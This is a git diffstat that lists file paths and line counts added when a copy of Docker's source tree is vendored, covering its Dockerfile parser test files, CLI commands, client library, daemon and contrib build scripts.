 .../testfiles/brimstone-consuldock/result     |    5 +
 .../brimstone-docker-consul/Dockerfile        |   52 +
 .../testfiles/brimstone-docker-consul/result  |    9 +
 .../testfiles/continueIndent/Dockerfile       |   36 +
 .../parser/testfiles/continueIndent/result    |   10 +
 .../testfiles/cpuguy83-nagios/Dockerfile      |   54 +
 .../parser/testfiles/cpuguy83-nagios/result   |   40 +
 .../parser/testfiles/docker/Dockerfile        |  103 +
 .../dockerfile/parser/testfiles/docker/result |   24 +
 .../parser/testfiles/env/Dockerfile           |   23 +
 .../dockerfile/parser/testfiles/env/result    |   16 +
 .../testfiles/escape-after-comment/Dockerfile |    9 +
 .../testfiles/escape-after-comment/result     |    3 +
 .../testfiles/escape-nonewline/Dockerfile     |    7 +
 .../parser/testfiles/escape-nonewline/result  |    3 +
 .../parser/testfiles/escape/Dockerfile        |    6 +
 .../dockerfile/parser/testfiles/escape/result |    3 +
 .../parser/testfiles/escapes/Dockerfile       |   14 +
 .../parser/testfiles/escapes/result           |    6 +
 .../parser/testfiles/flags/Dockerfile         |   10 +
 .../dockerfile/parser/testfiles/flags/result  |   10 +
 .../parser/testfiles/health/Dockerfile        |   10 +
 .../dockerfile/parser/testfiles/health/result |    9 +
 .../parser/testfiles/influxdb/Dockerfile      |   15 +
 .../parser/testfiles/influxdb/result          |   11 +
 .../Dockerfile                                |    1 +
 .../result                                    |    1 +
 .../Dockerfile                                |    1 +
 .../result                                    |    1 +
 .../Dockerfile                                |    1 +
 .../jeztah-invalid-json-single-quotes/result  |    1 +
 .../Dockerfile                                |    1 +
 .../result                                    |    1 +
 .../Dockerfile                                |    1 +
 .../result                                    |    1 +
 .../parser/testfiles/json/Dockerfile          |    8 +
 .../dockerfile/parser/testfiles/json/result   |    8 +
 .../kartar-entrypoint-oddities/Dockerfile     |    7 +
 .../kartar-entrypoint-oddities/result         |    7 +
 .../lk4d4-the-edge-case-generator/Dockerfile  |   48 +
 .../lk4d4-the-edge-case-generator/result      |   29 +
 .../parser/testfiles/mail/Dockerfile          |   16 +
 .../dockerfile/parser/testfiles/mail/result   |   14 +
 .../testfiles/multiple-volumes/Dockerfile     |    3 +
 .../parser/testfiles/multiple-volumes/result  |    2 +
 .../parser/testfiles/mumble/Dockerfile        |    7 +
 .../dockerfile/parser/testfiles/mumble/result |    4 +
 .../parser/testfiles/nginx/Dockerfile         |   14 +
 .../dockerfile/parser/testfiles/nginx/result  |   11 +
 .../parser/testfiles/tf2/Dockerfile           |   23 +
 .../dockerfile/parser/testfiles/tf2/result    |   20 +
 .../parser/testfiles/weechat/Dockerfile       |    9 +
 .../parser/testfiles/weechat/result           |    6 +
 .../parser/testfiles/znc/Dockerfile           |    7 +
 .../dockerfile/parser/testfiles/znc/result    |    5 +
 .../docker/builder/dockerfile/parser/utils.go |  176 +
 .../docker/builder/dockerfile/shell_parser.go |  329 +
 .../builder/dockerfile/shell_parser_test.go   |  155 +
 .../docker/builder/dockerfile/support.go      |   19 +
 .../docker/builder/dockerfile/support_test.go |   65 +
 .../docker/builder/dockerfile/utils_test.go   |   50 +
 .../docker/builder/dockerfile/wordsTest       |   25 +
 .../docker/docker/builder/dockerignore.go     |   48 +
 .../builder/dockerignore/dockerignore.go      |   49 +
 .../builder/dockerignore/dockerignore_test.go |   57 +
 .../docker/builder/dockerignore_test.go       |   95 +
 .../github.com/docker/docker/builder/git.go   |   28 +
 .../docker/docker/builder/remote.go           |  157 +
 .../docker/docker/builder/remote_test.go      |  213 +
 .../docker/docker/builder/tarsum.go           |  158 +
 .../docker/docker/builder/tarsum_test.go      |  265 +
 .../docker/docker/builder/utils_test.go       |   87 +
 vendor/github.com/docker/docker/cli/cobra.go  |  139 +
 .../cli/command/bundlefile/bundlefile.go      |   69 +
 .../cli/command/bundlefile/bundlefile_test.go |   77 +
 .../docker/cli/command/checkpoint/cmd.go      |   24 +
 .../docker/cli/command/checkpoint/create.go   |   58 +
 .../docker/cli/command/checkpoint/list.go     |   62 +
 .../docker/cli/command/checkpoint/remove.go   |   44 +
 .../docker/docker/cli/command/cli.go          |  260 +
 .../docker/cli/command/commands/commands.go   |   91 +
 .../docker/cli/command/container/attach.go    |  130 +
 .../docker/cli/command/container/cmd.go       |   46 +
 .../docker/cli/command/container/commit.go    |   76 +
 .../docker/docker/cli/command/container/cp.go |  303 +
 .../docker/cli/command/container/create.go    |  218 +
 .../docker/cli/command/container/diff.go      |   58 +
 .../docker/cli/command/container/exec.go      |  207 +
 .../docker/cli/command/container/exec_test.go |  116 +
 .../docker/cli/command/container/export.go    |   59 +
 .../docker/cli/command/container/hijack.go    |  116 +
 .../docker/cli/command/container/inspect.go   |   47 +
 .../docker/cli/command/container/kill.go      |   56 +
 .../docker/cli/command/container/list.go      |  141 +
 .../docker/cli/command/container/logs.go      |   87 +
 .../docker/cli/command/container/pause.go     |   49 +
 .../docker/cli/command/container/port.go      |   78 +
 .../docker/cli/command/container/prune.go     |   75 +
 .../docker/cli/command/container/ps_test.go   |  118 +
 .../docker/cli/command/container/rename.go    |   51 +
 .../docker/cli/command/container/restart.go   |   62 +
 .../docker/docker/cli/command/container/rm.go |   73 +
 .../docker/cli/command/container/run.go       |  285 +
 .../docker/cli/command/container/start.go     |  179 +
 .../docker/cli/command/container/stats.go     |  243 +
 .../cli/command/container/stats_helpers.go    |  226 +
 .../cli/command/container/stats_unit_test.go  |   20 +
 .../docker/cli/command/container/stop.go      |   67 +
 .../docker/cli/command/container/top.go       |   58 +
 .../docker/cli/command/container/tty.go       |  103 +
 .../docker/cli/command/container/unpause.go   |   50 +
 .../docker/cli/command/container/update.go    |  163 +
 .../docker/cli/command/container/utils.go     |  143 +
 .../docker/cli/command/container/wait.go      |   50 +
 .../docker/docker/cli/command/events_utils.go |   49 +
 .../docker/cli/command/formatter/container.go |  235 +
 .../cli/command/formatter/container_test.go   |  398 +
 .../docker/cli/command/formatter/custom.go    |   51 +
 .../cli/command/formatter/custom_test.go      |   28 +
 .../cli/command/formatter/disk_usage.go       |  334 +
 .../docker/cli/command/formatter/formatter.go |  123 +
 .../docker/cli/command/formatter/image.go     |  259 +
 .../cli/command/formatter/image_test.go       |  333 +
 .../docker/cli/command/formatter/network.go   |  117 +
 .../cli/command/formatter/network_test.go     |  208 +
 .../docker/cli/command/formatter/reflect.go   |   65 +
 .../cli/command/formatter/reflect_test.go     |   66 +
 .../docker/cli/command/formatter/service.go   |  322 +
 .../docker/cli/command/formatter/stats.go     |  211 +
 .../cli/command/formatter/stats_test.go       |  228 +
 .../docker/cli/command/formatter/volume.go    |  121 +
 .../cli/command/formatter/volume_test.go      |  189 +
 .../cli/command/idresolver/idresolver.go      |   90 +
 .../docker/docker/cli/command/image/build.go  |  477 +
 .../docker/docker/cli/command/image/cmd.go    |   33 +
 .../docker/cli/command/image/history.go       |   99 +
 .../docker/docker/cli/command/image/import.go |   88 +
 .../docker/cli/command/image/inspect.go       |   44 +
 .../docker/docker/cli/command/image/list.go   |   96 +
 .../docker/docker/cli/command/image/load.go   |   77 +
 .../docker/docker/cli/command/image/prune.go  |   92 +
 .../docker/docker/cli/command/image/pull.go   |   84 +
 .../docker/docker/cli/command/image/push.go   |   61 +
 .../docker/docker/cli/command/image/remove.go |   77 +
 .../docker/docker/cli/command/image/save.go   |   57 +
 .../docker/docker/cli/command/image/tag.go    |   41 +
 .../docker/docker/cli/command/image/trust.go  |  381 +
 .../docker/cli/command/image/trust_test.go    |   57 +
 .../docker/docker/cli/command/in.go           |   75 +
 .../docker/cli/command/inspect/inspector.go   |  195 +
 .../cli/command/inspect/inspector_test.go     |  221 +
 .../docker/docker/cli/command/network/cmd.go  |   28 +
 .../docker/cli/command/network/connect.go     |   64 +
 .../docker/cli/command/network/create.go      |  226 +
 .../docker/cli/command/network/disconnect.go  |   41 +
 .../docker/cli/command/network/inspect.go     |   45 +
 .../docker/docker/cli/command/network/list.go |   76 +
 .../docker/cli/command/network/prune.go       |   73 +
 .../docker/cli/command/network/remove.go      |   43 +
 .../docker/docker/cli/command/node/cmd.go     |   43 +
 .../docker/docker/cli/command/node/demote.go  |   36 +
 .../docker/docker/cli/command/node/inspect.go |  144 +
 .../docker/docker/cli/command/node/list.go    |  115 +
 .../docker/docker/cli/command/node/opts.go    |   60 +
 .../docker/docker/cli/command/node/promote.go |   36 +
 .../docker/docker/cli/command/node/ps.go      |   93 +
 .../docker/docker/cli/command/node/remove.go  |   56 +
 .../docker/docker/cli/command/node/update.go  |  121 +
 .../docker/docker/cli/command/out.go          |   69 +
 .../docker/docker/cli/command/plugin/cmd.go   |   31 +
 .../docker/cli/command/plugin/create.go       |  125 +
 .../docker/cli/command/plugin/disable.go      |   36 +
 .../docker/cli/command/plugin/enable.go       |   47 +
 .../docker/cli/command/plugin/inspect.go      |   42 +
 .../docker/cli/command/plugin/install.go      |  208 +
 .../docker/docker/cli/command/plugin/list.go  |   63 +
 .../docker/docker/cli/command/plugin/push.go  |   71 +
 .../docker/cli/command/plugin/remove.go       |   55 +
 .../docker/docker/cli/command/plugin/set.go   |   22 +
 .../docker/cli/command/plugin/upgrade.go      |  100 +
 .../docker/docker/cli/command/prune/prune.go  |   50 +
 .../docker/docker/cli/command/registry.go     |  186 +
 .../docker/cli/command/registry/login.go      |   85 +
 .../docker/cli/command/registry/logout.go     |   77 +
 .../docker/cli/command/registry/search.go     |  126 +
 .../docker/docker/cli/command/secret/cmd.go   |   25 +
 .../docker/cli/command/secret/create.go       |   79 +
 .../docker/cli/command/secret/inspect.go      |   45 +
 .../docker/docker/cli/command/secret/ls.go    |   68 +
 .../docker/cli/command/secret/remove.go       |   57 +
 .../docker/docker/cli/command/secret/utils.go |   76 +
 .../docker/docker/cli/command/service/cmd.go  |   29 +
 .../docker/cli/command/service/create.go      |  100 +
 .../docker/cli/command/service/inspect.go     |   84 +
 .../cli/command/service/inspect_test.go       |  129 +
 .../docker/docker/cli/command/service/list.go |  158 +
 .../docker/docker/cli/command/service/logs.go |  163 +
 .../docker/docker/cli/command/service/opts.go |  648 ++
 .../docker/cli/command/service/opts_test.go   |  107 +
 .../docker/cli/command/service/parse.go       |   68 +
 .../docker/docker/cli/command/service/ps.go   |   76 +
 .../docker/cli/command/service/remove.go      |   47 +
 .../docker/cli/command/service/scale.go       |   96 +
 .../docker/cli/command/service/trust.go       |   96 +
 .../docker/cli/command/service/update.go      |  849 ++
 .../docker/cli/command/service/update_test.go |  384 +
 .../docker/docker/cli/command/stack/cmd.go    |   35 +
 .../docker/docker/cli/command/stack/common.go |   60 +
 .../docker/docker/cli/command/stack/deploy.go |  357 +
 .../cli/command/stack/deploy_bundlefile.go    |   83 +
 .../docker/docker/cli/command/stack/list.go   |  113 +
 .../docker/docker/cli/command/stack/opts.go   |   49 +
 .../docker/docker/cli/command/stack/ps.go     |   61 +
 .../docker/docker/cli/command/stack/remove.go |  112 +
 .../docker/cli/command/stack/services.go      |   79 +
 .../docker/docker/cli/command/swarm/cmd.go    |   28 +
 .../docker/docker/cli/command/swarm/init.go   |   85 +
 .../docker/docker/cli/command/swarm/join.go   |   69 +
 .../docker/cli/command/swarm/join_token.go    |  105 +
 .../docker/docker/cli/command/swarm/leave.go  |   44 +
 .../docker/docker/cli/command/swarm/opts.go   |  209 +
 .../docker/cli/command/swarm/opts_test.go     |   37 +
 .../docker/docker/cli/command/swarm/unlock.go |   54 +
 .../docker/cli/command/swarm/unlock_key.go    |   79 +
 .../docker/docker/cli/command/swarm/update.go |   72 +
 .../docker/docker/cli/command/system/cmd.go   |   26 +
 .../docker/docker/cli/command/system/df.go    |   56 +
 .../docker/cli/command/system/events.go       |  140 +
 .../docker/docker/cli/command/system/info.go  |  334 +
 .../docker/cli/command/system/inspect.go      |  203 +
 .../docker/docker/cli/command/system/prune.go |   93 +
 .../docker/cli/command/system/version.go      |  113 +
 .../docker/docker/cli/command/task/print.go   |  161 +
 .../docker/docker/cli/command/trust.go        |   39 +
 .../docker/docker/cli/command/utils.go        |   87 +
 .../docker/docker/cli/command/volume/cmd.go   |   45 +
 .../docker/cli/command/volume/create.go       |  111 +
 .../docker/cli/command/volume/inspect.go      |   55 +
 .../docker/docker/cli/command/volume/list.go  |   91 +
 .../docker/docker/cli/command/volume/prune.go |   75 +
 .../docker/cli/command/volume/remove.go       |   68 +
 .../docker/cli/compose/convert/compose.go     |  116 +
 .../cli/compose/convert/compose_test.go       |  122 +
 .../docker/cli/compose/convert/service.go     |  416 +
 .../cli/compose/convert/service_test.go       |  216 +
 .../docker/cli/compose/convert/volume.go      |  128 +
 .../docker/cli/compose/convert/volume_test.go |  133 +
 .../compose/interpolation/interpolation.go    |   90 +
 .../interpolation/interpolation_test.go       |   59 +
 .../docker/cli/compose/loader/example1.env    |    8 +
 .../docker/cli/compose/loader/example2.env    |    1 +
 .../cli/compose/loader/full-example.yml       |  287 +
 .../docker/cli/compose/loader/loader.go       |  653 ++
 .../docker/cli/compose/loader/loader_test.go  |  800 ++
 .../docker/cli/compose/schema/bindata.go      |  260 +
 .../schema/data/config_schema_v3.0.json       |  383 +
 .../schema/data/config_schema_v3.1.json       |  428 +
 .../docker/cli/compose/schema/schema.go       |  137 +
 .../docker/cli/compose/schema/schema_test.go  |   52 +
 .../docker/cli/compose/template/template.go   |  100 +
 .../cli/compose/template/template_test.go     |   83 +
 .../docker/docker/cli/compose/types/types.go  |  253 +
 vendor/github.com/docker/docker/cli/error.go  |   33 +
 .../docker/docker/cli/flags/client.go         |   13 +
 .../docker/docker/cli/flags/common.go         |  120 +
 .../docker/docker/cli/flags/common_test.go    |   42 +
 .../github.com/docker/docker/cli/required.go  |   96 +
 .../docker/docker/cli/trust/trust.go          |  232 +
 .../docker/docker/cliconfig/config.go         |  120 +
 .../docker/docker/cliconfig/config_test.go    |  621 ++
 .../docker/cliconfig/configfile/file.go       |  183 +
 .../docker/cliconfig/configfile/file_test.go  |   27 +
 .../cliconfig/credentials/credentials.go      |   17 +
 .../cliconfig/credentials/default_store.go    |   22 +
 .../credentials/default_store_darwin.go       |    3 +
 .../credentials/default_store_linux.go        |    3 +
 .../credentials/default_store_unsupported.go  |    5 +
 .../credentials/default_store_windows.go      |    3 +
 .../cliconfig/credentials/file_store.go       |   53 +
 .../cliconfig/credentials/file_store_test.go  |  139 +
 .../cliconfig/credentials/native_store.go     |  144 +
 .../credentials/native_store_test.go          |  355 +
 .../github.com/docker/docker/client/README.md |   35 +
 .../docker/docker/client/checkpoint_create.go |   13 +
 .../docker/client/checkpoint_create_test.go   |   73 +
 .../docker/docker/client/checkpoint_delete.go |   20 +
 .../docker/client/checkpoint_delete_test.go   |   54 +
 .../docker/docker/client/checkpoint_list.go   |   28 +
 .../docker/client/checkpoint_list_test.go     |   57 +
 .../github.com/docker/docker/client/client.go |  246 +
 .../docker/docker/client/client_mock_test.go  |   45 +
 .../docker/docker/client/client_test.go       |  283 +
 .../docker/docker/client/client_unix.go       |    6 +
 .../docker/docker/client/client_windows.go    |    4 +
 .../docker/docker/client/container_attach.go  |   37 +
 .../docker/docker/client/container_commit.go  |   53 +
 .../docker/client/container_commit_test.go    |   96 +
 .../docker/docker/client/container_copy.go    |   97 +
 .../docker/client/container_copy_test.go      |  244 +
 .../docker/docker/client/container_create.go  |   50 +
 .../docker/client/container_create_test.go    |   76 +
 .../docker/docker/client/container_diff.go    |   23 +
 .../docker/client/container_diff_test.go      |   61 +
 .../docker/docker/client/container_exec.go    |   54 +
 .../docker/client/container_exec_test.go      |  157 +
 .../docker/docker/client/container_export.go  |   20 +
 .../docker/client/container_export_test.go    |   50 +
 .../docker/docker/client/container_inspect.go |   54 +
 .../docker/client/container_inspect_test.go   |  125 +
 .../docker/docker/client/container_kill.go    |   17 +
 .../docker/client/container_kill_test.go      |   46 +
 .../docker/docker/client/container_list.go    |   56 +
 .../docker/client/container_list_test.go      |   96 +
 .../docker/docker/client/container_logs.go    |   52 +
 .../docker/client/container_logs_test.go      |  133 +
 .../docker/docker/client/container_pause.go   |   10 +
 .../docker/client/container_pause_test.go     |   41 +
 .../docker/docker/client/container_prune.go   |   36 +
 .../docker/docker/client/container_remove.go  |   27 +
 .../docker/client/container_remove_test.go    |   59 +
 .../docker/docker/client/container_rename.go  |   16 +
 .../docker/client/container_rename_test.go    |   46 +
 .../docker/docker/client/container_resize.go  |   29 +
 .../docker/client/container_resize_test.go    |   82 +
 .../docker/docker/client/container_restart.go |   22 +
 .../docker/client/container_restart_test.go   |   48 +
 .../docker/docker/client/container_start.go   |   24 +
 .../docker/client/container_start_test.go     |   58 +
 .../docker/docker/client/container_stats.go   |   26 +
 .../docker/client/container_stats_test.go     |   70 +
 .../docker/docker/client/container_stop.go    |   21 +
 .../docker/client/container_stop_test.go      |   48 +
 .../docker/docker/client/container_top.go     |   28 +
 .../docker/client/container_top_test.go       |   74 +
 .../docker/docker/client/container_unpause.go |   10 +
 .../docker/client/container_unpause_test.go   |   41 +
 .../docker/docker/client/container_update.go  |   22 +
 .../docker/client/container_update_test.go    |   58 +
 .../docker/docker/client/container_wait.go    |   26 +
 .../docker/client/container_wait_test.go      |   70 +
 .../docker/docker/client/disk_usage.go        |   26 +
 .../github.com/docker/docker/client/errors.go |  278 +
 .../github.com/docker/docker/client/events.go |  102 +
 .../docker/docker/client/events_test.go       |  165 +
 .../github.com/docker/docker/client/hijack.go |  177 +
 .../docker/docker/client/image_build.go       |  123 +
 .../docker/docker/client/image_build_test.go  |  233 +
 .../docker/docker/client/image_create.go      |   34 +
 .../docker/docker/client/image_create_test.go |   76 +
 .../docker/docker/client/image_history.go     |   22 +
 .../docker/client/image_history_test.go       |   60 +
 .../docker/docker/client/image_import.go      |   37 +
 .../docker/docker/client/image_import_test.go |   81 +
 .../docker/docker/client/image_inspect.go     |   33 +
 .../docker/client/image_inspect_test.go       |   71 +
 .../docker/docker/client/image_list.go        |   45 +
 .../docker/docker/client/image_list_test.go   |  159 +
 .../docker/docker/client/image_load.go        |   30 +
 .../docker/docker/client/image_load_test.go   |   95 +
 .../docker/docker/client/image_prune.go       |   36 +
 .../docker/docker/client/image_pull.go        |   46 +
 .../docker/docker/client/image_pull_test.go   |  199 +
 .../docker/docker/client/image_push.go        |   54 +
 .../docker/docker/client/image_push_test.go   |  180 +
 .../docker/docker/client/image_remove.go      |   31 +
 .../docker/docker/client/image_remove_test.go |   95 +
 .../docker/docker/client/image_save.go        |   22 +
 .../docker/docker/client/image_save_test.go   |   58 +
 .../docker/docker/client/image_search.go      |   51 +
 .../docker/docker/client/image_search_test.go |  165 +
 .../docker/docker/client/image_tag.go         |   34 +
 .../docker/docker/client/image_tag_test.go    |  121 +
 .../github.com/docker/docker/client/info.go   |   26 +
 .../docker/docker/client/info_test.go         |   76 +
 .../docker/docker/client/interface.go         |  171 +
 .../docker/client/interface_experimental.go   |   17 +
 .../docker/docker/client/interface_stable.go  |   10 +
 .../github.com/docker/docker/client/login.go  |   29 +
 .../docker/docker/client/network_connect.go   |   18 +
 .../docker/client/network_connect_test.go     |  107 +
 .../docker/docker/client/network_create.go    |   25 +
 .../docker/client/network_create_test.go      |   72 +
 .../docker/client/network_disconnect.go       |   14 +
 .../docker/client/network_disconnect_test.go  |   64 +
 .../docker/docker/client/network_inspect.go   |   38 +
 .../docker/client/network_inspect_test.go     |   69 +
 .../docker/docker/client/network_list.go      |   31 +
 .../docker/docker/client/network_list_test.go |  108 +
 .../docker/docker/client/network_prune.go     |   36 +
 .../docker/docker/client/network_remove.go    |   10 +
 .../docker/client/network_remove_test.go      |   47 +
 .../docker/docker/client/node_inspect.go      |   33 +
 .../docker/docker/client/node_inspect_test.go |   65 +
 .../docker/docker/client/node_list.go         |   36 +
 .../docker/docker/client/node_list_test.go    |   94 +
 .../docker/docker/client/node_remove.go       |   21 +
 .../docker/docker/client/node_remove_test.go  |   69 +
 .../docker/docker/client/node_update.go       |   18 +
 .../docker/docker/client/node_update_test.go  |   49 +
 .../github.com/docker/docker/client/ping.go   |   30 +
 .../docker/docker/client/plugin_create.go     |   26 +
 .../docker/docker/client/plugin_disable.go    |   19 +
 .../docker/client/plugin_disable_test.go      |   48 +
 .../docker/docker/client/plugin_enable.go     |   19 +
 .../docker/client/plugin_enable_test.go       |   48 +
 .../docker/docker/client/plugin_inspect.go    |   32 +
 .../docker/client/plugin_inspect_test.go      |   54 +
 .../docker/docker/client/plugin_install.go    |  113 +
 .../docker/docker/client/plugin_list.go       |   21 +
 .../docker/docker/client/plugin_list_test.go  |   59 +
 .../docker/docker/client/plugin_push.go       |   17 +
 .../docker/docker/client/plugin_push_test.go  |   51 +
 .../docker/docker/client/plugin_remove.go     |   20 +
 .../docker/client/plugin_remove_test.go       |   49 +
 .../docker/docker/client/plugin_set.go        |   12 +
 .../docker/docker/client/plugin_set_test.go   |   47 +
 .../docker/docker/client/plugin_upgrade.go    |   37 +
 .../docker/docker/client/request.go           |  247 +
 .../docker/docker/client/request_test.go      |   92 +
 .../docker/docker/client/secret_create.go     |   24 +
 .../docker/client/secret_create_test.go       |   57 +
 .../docker/docker/client/secret_inspect.go    |   34 +
 .../docker/client/secret_inspect_test.go      |   65 +
 .../docker/docker/client/secret_list.go       |   35 +
 .../docker/docker/client/secret_list_test.go  |   94 +
 .../docker/docker/client/secret_remove.go     |   10 +
 .../docker/client/secret_remove_test.go       |   47 +
 .../docker/docker/client/secret_update.go     |   19 +
 .../docker/client/secret_update_test.go       |   49 +
 .../docker/docker/client/service_create.go    |   30 +
 .../docker/client/service_create_test.go      |   57 +
 .../docker/docker/client/service_inspect.go   |   33 +
 .../docker/client/service_inspect_test.go     |   65 +
 .../docker/docker/client/service_list.go      |   35 +
 .../docker/docker/client/service_list_test.go |   94 +
 .../docker/docker/client/service_logs.go      |   52 +
 .../docker/docker/client/service_logs_test.go |  133 +
 .../docker/docker/client/service_remove.go    |   10 +
 .../docker/client/service_remove_test.go      |   47 +
 .../docker/docker/client/service_update.go    |   41 +
 .../docker/client/service_update_test.go      |   77 +
 .../docker/client/swarm_get_unlock_key.go     |   21 +
 .../docker/docker/client/swarm_init.go        |   21 +
 .../docker/docker/client/swarm_init_test.go   |   54 +
 .../docker/docker/client/swarm_inspect.go     |   21 +
 .../docker/client/swarm_inspect_test.go       |   56 +
 .../docker/docker/client/swarm_join.go        |   13 +
 .../docker/docker/client/swarm_join_test.go   |   51 +
 .../docker/docker/client/swarm_leave.go       |   18 +
 .../docker/docker/client/swarm_leave_test.go  |   66 +
 .../docker/docker/client/swarm_unlock.go      |   17 +
 .../docker/docker/client/swarm_update.go      |   22 +
 .../docker/docker/client/swarm_update_test.go |   49 +
 .../docker/docker/client/task_inspect.go      |   34 +
 .../docker/docker/client/task_inspect_test.go |   54 +
 .../docker/docker/client/task_list.go         |   35 +
 .../docker/docker/client/task_list_test.go    |   94 +
 .../docker/docker/client/testdata/ca.pem      |   18 +
 .../docker/docker/client/testdata/cert.pem    |   18 +
 .../docker/docker/client/testdata/key.pem     |   27 +
 .../docker/docker/client/transport.go         |   28 +
 .../github.com/docker/docker/client/utils.go  |   33 +
 .../docker/docker/client/version.go           |   21 +
 .../docker/docker/client/volume_create.go     |   21 +
 .../docker/client/volume_create_test.go       |   75 +
 .../docker/docker/client/volume_inspect.go    |   38 +
 .../docker/client/volume_inspect_test.go      |   76 +
 .../docker/docker/client/volume_list.go       |   32 +
 .../docker/docker/client/volume_list_test.go  |   98 +
 .../docker/docker/client/volume_prune.go      |   36 +
 .../docker/docker/client/volume_remove.go     |   21 +
 .../docker/client/volume_remove_test.go       |   47 +
 .../docker/docker/cmd/docker/daemon_none.go   |   27 +
 .../docker/cmd/docker/daemon_none_test.go     |   17 +
 .../docker/cmd/docker/daemon_unit_test.go     |   30 +
 .../docker/docker/cmd/docker/daemon_unix.go   |   79 +
 .../docker/docker/cmd/docker/docker.go        |  180 +
 .../docker/docker/cmd/docker/docker_test.go   |   32 +
 .../docker/cmd/docker/docker_windows.go       |   18 +
 .../docker/docker/cmd/dockerd/README.md       |    3 +
 .../docker/docker/cmd/dockerd/daemon.go       |  524 ++
 .../docker/cmd/dockerd/daemon_freebsd.go      |    5 +
 .../docker/docker/cmd/dockerd/daemon_linux.go |   11 +
 .../docker/cmd/dockerd/daemon_solaris.go      |   85 +
 .../docker/docker/cmd/dockerd/daemon_test.go  |  145 +
 .../docker/docker/cmd/dockerd/daemon_unix.go  |  137 +
 .../docker/cmd/dockerd/daemon_unix_test.go    |  114 +
 .../docker/cmd/dockerd/daemon_windows.go      |   92 +
 .../docker/docker/cmd/dockerd/docker.go       |  110 +
 .../docker/cmd/dockerd/docker_windows.go      |   18 +
 .../dockerd/hack/malformed_host_override.go   |  121 +
 .../hack/malformed_host_override_test.go      |  124 +
 .../docker/docker/cmd/dockerd/metrics.go      |   27 +
 .../docker/cmd/dockerd/service_unsupported.go |   14 +
 .../docker/cmd/dockerd/service_windows.go     |  426 +
 .../docker/docker/container/archive.go        |   76 +
 .../docker/docker/container/container.go      | 1103 +++
 .../docker/container/container_linux.go       |    9 +
 .../docker/container/container_notlinux.go    |   23 +
 .../docker/container/container_unit_test.go   |   60 +
 .../docker/docker/container/container_unix.go |  448 +
 .../docker/container/container_windows.go     |  111 +
 .../docker/docker/container/health.go         |   49 +
 .../docker/docker/container/history.go        |   30 +
 .../docker/docker/container/memory_store.go   |   95 +
 .../docker/container/memory_store_test.go     |  106 +
 .../docker/docker/container/monitor.go        |   46 +
 .../docker/docker/container/mounts_unix.go    |   12 +
 .../docker/docker/container/mounts_windows.go |    8 +
 .../docker/docker/container/state.go          |  343 +
 .../docker/docker/container/state_solaris.go  |    7 +
 .../docker/docker/container/state_test.go     |  113 +
 .../docker/docker/container/state_unix.go     |   10 +
 .../docker/docker/container/state_windows.go  |    7 +
 .../docker/docker/container/store.go          |   28 +
 .../docker/docker/container/stream/streams.go |  143 +
 .../docker/docker/contrib/README.md           |    4 +
 .../docker/docker/contrib/REVIEWERS           |    1 +
 .../docker/docker/contrib/apparmor/main.go    |   56 +
 .../docker/contrib/apparmor/template.go       |  268 +
 .../contrib/builder/deb/aarch64/build.sh      |   10 +
 .../contrib/builder/deb/aarch64/generate.sh   |  118 +
 .../deb/aarch64/ubuntu-trusty/Dockerfile      |   24 +
 .../deb/aarch64/ubuntu-xenial/Dockerfile      |   22 +
 .../contrib/builder/deb/amd64/README.md       |    5 +
 .../docker/contrib/builder/deb/amd64/build.sh |   10 +
 .../deb/amd64/debian-jessie/Dockerfile        |   20 +
 .../deb/amd64/debian-stretch/Dockerfile       |   20 +
 .../deb/amd64/debian-wheezy/Dockerfile        |   22 +
 .../contrib/builder/deb/amd64/generate.sh     |  149 +
 .../deb/amd64/ubuntu-precise/Dockerfile       |   16 +
 .../deb/amd64/ubuntu-trusty/Dockerfile        |   16 +
 .../deb/amd64/ubuntu-xenial/Dockerfile        |   16 +
 .../deb/amd64/ubuntu-yakkety/Dockerfile       |   16 +
 .../deb/armhf/debian-jessie/Dockerfile        |   20 +
 .../contrib/builder/deb/armhf/generate.sh     |  158 +
 .../deb/armhf/raspbian-jessie/Dockerfile      |   22 +
 .../deb/armhf/ubuntu-trusty/Dockerfile        |   16 +
 .../deb/armhf/ubuntu-xenial/Dockerfile        |   16 +
 .../deb/armhf/ubuntu-yakkety/Dockerfile       |   16 +
 .../contrib/builder/deb/ppc64le/build.sh      |   10 +
 .../contrib/builder/deb/ppc64le/generate.sh   |  103 +
 .../deb/ppc64le/ubuntu-trusty/Dockerfile      |   16 +
 .../deb/ppc64le/ubuntu-xenial/Dockerfile      |   16 +
 .../deb/ppc64le/ubuntu-yakkety/Dockerfile     |   16 +
 .../docker/contrib/builder/deb/s390x/build.sh |   10 +
 .../contrib/builder/deb/s390x/generate.sh     |   96 +
 .../deb/s390x/ubuntu-xenial/Dockerfile        |   16 +
 .../contrib/builder/rpm/amd64/README.md       |    5 +
 .../docker/contrib/builder/rpm/amd64/build.sh |   10 +
 .../builder/rpm/amd64/centos-7/Dockerfile     |   19 +
 .../builder/rpm/amd64/fedora-24/Dockerfile    |   19 +
 .../builder/rpm/amd64/fedora-25/Dockerfile    |   19 +
 .../contrib/builder/rpm/amd64/generate.sh     |  189 +
 .../rpm/amd64/opensuse-13.2/Dockerfile        |   18 +
 .../rpm/amd64/oraclelinux-6/Dockerfile        |   28 +
 .../rpm/amd64/oraclelinux-7/Dockerfile        |   18 +
 .../builder/rpm/amd64/photon-1.0/Dockerfile   |   18 +
 .../docker/docker/contrib/check-config.sh     |  354 +
 .../docker/contrib/completion/REVIEWERS       |    2 +
 .../docker/contrib/completion/bash/docker     | 4282 +++++++++
 .../contrib/completion/fish/docker.fish       |  405 +
 .../contrib/completion/powershell/readme.txt  |    1 +
 .../docker/contrib/completion/zsh/REVIEWERS   |    2 +
 .../docker/contrib/completion/zsh/_docker     | 2787 ++++++
 .../contrib/desktop-integration/README.md     |   11 +
 .../desktop-integration/chromium/Dockerfile   |   36 +
 .../desktop-integration/gparted/Dockerfile    |   31 +
 .../contrib/docker-device-tool/README.md      |   14 +
 .../contrib/docker-device-tool/device_tool.go |  176 +
 .../docker-device-tool/device_tool_windows.go |    4 +
 .../docker/docker/contrib/dockerize-disk.sh   |  118 +
 .../contrib/download-frozen-image-v1.sh       |  108 +
 .../contrib/download-frozen-image-v2.sh       |  121 +
 .../docker/docker/contrib/editorconfig        |   13 +
 .../docker/docker/contrib/gitdm/aliases       |  148 +
 .../docker/docker/contrib/gitdm/domain-map    |   39 +
 .../docker/contrib/gitdm/generate_aliases.sh  |   16 +
 .../docker/docker/contrib/gitdm/gitdm.config  |   17 +
 .../docker/contrib/httpserver/Dockerfile      |    4 +
 .../contrib/httpserver/Dockerfile.solaris     |    4 +
 .../docker/contrib/httpserver/server.go       |   12 +
